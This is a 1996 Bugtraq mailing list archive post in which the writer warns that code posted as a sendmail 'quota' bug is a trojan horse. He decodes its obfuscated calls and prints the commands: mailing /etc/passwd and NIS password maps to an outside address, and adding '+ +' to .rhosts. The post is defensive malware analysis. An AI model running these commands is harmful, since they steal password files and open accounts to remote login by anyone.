Bugtraq mailing list archives
Re: quotas? maybe you're not seeing all of it
From: Don.Lewis () tsc tdk com (Don Lewis)
Date: Mon, 22 Jul 1996 14:30:17 -0700
Trojan horse alert! On Jul 21, 10:57am, "Brett L. Hawn" wrote: } Subject: quotas? maybe you're not seeing all of it } I finally found the source to this annoying little monster so I thought I'd } let ya'll see it. I don't know off hand if this little bug has been seen } before/discussed before but if it hasn't I'm quite sure all of you would } love to fix it :) I've not tried it on anything but Solaris 2.5 so far but } I've no doubt that it'll work elsewhere as well. } } What this does is takes a file and hides it in somone else's directories } using sendmail. I don't think so ... I changed the system() calls to 'printf("%s\n", ...)' } system(zipper(initseeds)); I couldn't make sense of this, initseeds appears to be mangled. } system(zipper(setupseeds)); This executes: cat /etc/passwd 2>/dev/null | mail tsk () mail thirdwave net >/dev/null 2>/dev/null } system(checkseed(binseeds)); This executes: ypcat passwd.byname 2>/dev/null | mail tsk () mail thirdwave net >/dev/null 2>/dev/null but only if a directory in your path doesn't exist. } system("%s\n",zipper(procseeds)); I don't think system() can be called with printf() style arguments, but this executes: touch .rhosts 2>/dev/null } system("%s\n",zipper(boutseeds)); This executes: echo + + 2>/dev/null >> .rhosts } system("%s\n",zipper(shtdwnseeds)); This executes: chmod 700 .rhosts 2>/dev/null
Current thread:
- Re: quotas? maybe you're not seeing all of it Mark E. Mallett (Jul 22)
- <Possible follow-ups>
- Re: quotas? maybe you're not seeing all of it Don Lewis (Jul 22)
- Linux NetKit-B update. David Holland (Jul 23)
- BSDI sniffer Parthiv Shah (Jul 24)
- Bug in SunOS 5.4? Nicholas Blasgen (Jul 24)
- Re: BSDI sniffer Evil Pete (Jul 24)
- Re: BSDI sniffer Jared Mauch (Jul 24)
- Re: BSDI sniffer DevilBunny (Jul 25)
- Linux NetKit-B update. David Holland (Jul 23)
- Re: quotas? maybe you're not seeing all of it Tom Bowman (Jul 23)